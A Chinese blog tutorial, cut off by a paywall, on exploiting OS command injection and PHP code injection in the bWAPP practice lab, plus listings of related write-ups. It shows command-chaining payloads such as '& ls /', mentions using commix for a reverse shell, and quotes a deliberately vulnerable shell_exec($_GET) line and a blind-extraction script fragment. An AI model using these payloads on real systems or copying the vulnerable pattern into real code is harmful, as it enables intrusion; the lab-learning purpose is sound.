bWAPP OS Command Injection(Blind) / PHP Code Injection 系统命令执行

最新推荐文章于 2024-12-15 18:00:00 发布
原创 最新推荐文章于 2024-12-15 18:00:00 发布 · 1.5k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了渗透测试中的命令执行注入和PHP代码注入漏洞,包括不同难度级别的漏洞分析与利用方法,如利用commix工具反弹shell,以及如何在盲注环境下成功执行命令。同时,介绍了Apache错误日志写Webshell的技巧,结合目录穿越和文件包含漏洞实现。

前言

命令执行注入漏洞(Command Injection), 是程序能够调用函数, 将字符串转化为可执行代码, 且没有考虑到攻击者可以利用字符串, 造成代码执行漏洞。很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。

具体见之前的blog:  漏洞之执行漏洞

 

 

0x01  OS Command Injection

分析

如果lookup之后没有输出,  是由于缺少nslookup命令,  到服务器上安装即可:

sudo apt-get install dnsutils

Low

Low级别没有任何防护,  直接通过os一行执行多条语句的原理注入即可:

www.baidu.com & ls /

www.baidu.com && ls /

www.baidu.com;ls /

cmd1&&cmd2 和 cmd1&cmd2的区别是:

前者是当cmd1执行成功才执行cmd2; 后者是不管cmd1执行成功与否, 都执行cmd2

漏洞利用

这里就要利用 commix  工具 ( it is very easy to find and exploit a command injection vulnerability)

这里主要用commix通过OS命令注入漏洞来反弹shell

拿到post的参数和cookie:

 然后用如下命令反弹shell:

commix.py -u "http://192.168.10.10
最低0.47元/天 解锁文章
bWAPP-os-command-Injection
hee_mee的博客
09-16 722
zeroNIl
bWAPP闯关系列(OS Command Injection)~
weixin_55648772的博客
10-03 1950
bWAPP靶场闯关系列(OS Command Injection+PHP Code Injection+Server-Side Includes (SSI) Injection
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 2万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
php ping 命令注入,bWAPP OS Command Injection(Blind) 系统命令执行注入/盲注
weixin_39586235的博客
04-02 534
前言命令执行注入漏洞(Command Injection), 是程序能够调用函数, 将字符串转化为可执行代码, 且没有考虑到攻击者可以利用字符串, 造成代码执行漏洞。很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。具体见之前的blog:分析如果lookup之后没有输出, 是由于缺少nslookup命令, 到服务器上安装即可:sudo apt-get install dnsutils...
bWAPP靶场之OS Command Injection(+Blind)
0nc3的博客
04-04 1416
0x00 前言 原谅我太菜了,第一次听命令注入的盲注类型。。。 0x01 练习过程 1.low 只ping一个正常的ip地址,反应时长为130ms 拼接了其他正常命令注入,用时140ms 拼接了其他不正常命令注入,用时140ms 0x02 结语 盲注嘛,就是注入后页面不会返回信息,但是可以根据其他地方的区别来判断是否注入成功,get it ...
bWAPPOS Command Injection(Blind)&PHP Code Injection 系统命令执行
最新发布
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-15 1145
那天下着很大的雨,母亲从城里走回来的时候,浑身就是一个泥人,那一刻我就知道我没有别的选择了
4 OS command injection操作系统命令注入
(∪.∪ )...zzz的博客
04-29 1116
4 OS command injection操作系统命令注入 目录4 OS command injection操作系统命令注入一、What is OS command injection?二、Executing arbitrary commandsLab: OS command injection, simple case三、 Useful commands In this section, we’ll explain what OS command injection is, describe how v
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1505
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
bWAPP----HTML OS Command Injection - Blind
weixin_30877181的博客
07-14 224
OS Command Injection - Blind 先上代码,他判断了win还是linux然后进行了ping但是结果并没有返回。 1 <div id="main"> 2 3 <h1>OS Command Injection - Blind</h1> 4 5 <form action="<?php e...
bWAPP----OS Command Injection
weixin_30588907的博客
07-14 247
OS Command Injection 界面: 给一个域名,它帮你返回DNS 代码: 1 <div id="main"> 2 3 <h1>OS Command Injection</h1> 4 5 <form action="<?php echo($_SERVER["SCRIPT_NAME...
Cookie在线注入工具
12-13
Cookie在线注入工具 Cookie注入
bWAPP--PHP Code Injection
hee_mee的博客
09-18 326
zeronil
bWAPP----PHP Code Injection
weixin_30507269的博客
07-20 202
PHP Code Injection 主要代码 1 <div id="main"> 2 3 <h1>PHP Code Injection</h1> 4 5 <p>This is just a test page, reflecting back your <a href="<?...
bWAPP靶场之PHP Code Injection
0nc3的博客
04-04 991
0x00 PHP Code Injection 核心代码: <?php if(isset($_REQUEST["message"])) { // If the security level is not MEDIUM or HIGH if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level...
命令执行盲注
灰太的表格的博客
06-11 1029
命令执行盲注 想练练写脚本,就自己搭了个环境。是关于命令执行shell_exec盲注的。环境代码写的也是简陋版的。flag在文件flag里 这是1.php的内容: 打开页面是这样的: 然后自己花了十多分钟写的脚本: import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
PHP Code Injection
weixin_33774615的博客
12-28 754
作者:2月 2月发现的漏洞,并负责测试与技术解释。由菲负责做文档记录。 开始测试………… “http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport&month=all&year=all&fee_type=trans1&fee_status=reversed”...
Command Injection
kezhen的专栏
04-04 3715
Description The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. In situation like this, the application, which execu
shell_exec命令执行盲注
小龙在线
09-13 840
首先搭建一下服务端: flag index.php flag flag{abc123} index.php <?php shell_exec($_GET['imagin']);?> exp.py import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
Elixir模块OsCommand:简易操作系统命令执行与处理
在 Elixir 中,可以使用 Erlang 提供的函数如 `:os.cmd/1` 来执行系统命令,获取命令的输出。 ### OsCommand 模块设计目的 OsCommand 模块的设计是为了提供一个方便且统一的方式来执行这些操作系统的命令。使用 Os...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值